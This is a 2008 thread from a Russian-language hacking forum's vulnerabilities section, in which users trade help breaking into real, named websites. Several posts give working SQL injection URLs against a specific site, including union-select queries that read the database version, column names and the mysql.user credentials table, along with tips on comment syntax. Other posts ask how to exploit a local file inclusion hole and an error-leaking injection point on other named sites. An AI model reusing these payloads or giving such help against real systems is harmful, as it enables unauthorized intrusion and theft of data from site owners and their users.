ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3991  
Старый 02.12.2008, 21:26
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Да с синтаксис SQL я знаю неоч! Но факт остается фактом! Этот вариант прокатывает во многих случаях!!!
 
Ответить с цитированием

  #3992  
Старый 02.12.2008, 21:27
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от BanQui  
Хммм в большенстве случаев этот вариант прокатывает!!!
Гениально! Главное сказать и не важно что не правильно.
Оператор order by сортирует результат запроса, а отсортировывать пустой результат (а со значением -1 другого и не будет) - не самая лучшая идея.
Использовать order by нужно только при существующих значениях.

Ошибка в данном случае была в использование /* - в новых версиях мускула нельзя не закрывать этот комментарий, а значит теперь обходимся комментариями '#' и '-- '.
 
Ответить с цитированием

  #3993  
Старый 02.12.2008, 21:37
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Чего опять ему надо ?((

http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,version( ),3,4--
(безрезультатно()

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.--
тоже /=

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.+limit+1,1--

даже версию не посмотреть(
 
Ответить с цитированием

  #3994  
Старый 02.12.2008, 21:41
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

mysql error: The used SELECT statements have a different number of columns

читай Сначала кол-во колонок подбери
 
Ответить с цитированием

  #3995  
Старый 02.12.2008, 21:57
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Блин на мой вопрос с ПХП кто нибуть ответит??? Если кто не видел вот он :
Цитата:
Сообщение от BanQui  
Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?
------------------------------------
Цитата:
Сообщение от -m0rgan-  
Почитай здесь:
http://forum.antichat.ru/thread12123.html
Я там не понял как именно добавлять файл! Читал раз 5!!! Как китайский блин!!!
 
Ответить с цитированием

  #3996  
Старый 03.12.2008, 01:58
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

geforse
помоему 2 и 3 принтабельные.. но вывода не увидел, логический вывод:

Цитата:
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+information_schema.tables--
5 ветка..
Цитата:
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+mysql.user--
с правами
 
Ответить с цитированием

  #3997  
Старый 03.12.2008, 05:14
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034

Репутация: 0
По умолчанию

как раскрутить?

http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1
 
Ответить с цитированием

  #3998  
Старый 03.12.2008, 08:24
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Sanic1977
никак нема иьекта )
 
Ответить с цитированием

  #3999  
Старый 03.12.2008, 08:30
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

Цитата:
http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1
инъект отсутствует
 
Ответить с цитированием

  #4000  
Старый 03.12.2008, 22:24
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981

Репутация: 1
По умолчанию

http://www.comingsoon.net/news.php?id=1'

Получил вот такой ответ

Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

Есть ли тут injection? Если есть пожалуйста помогите раскрутить а то чет никак не могу понять как запросик зделать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ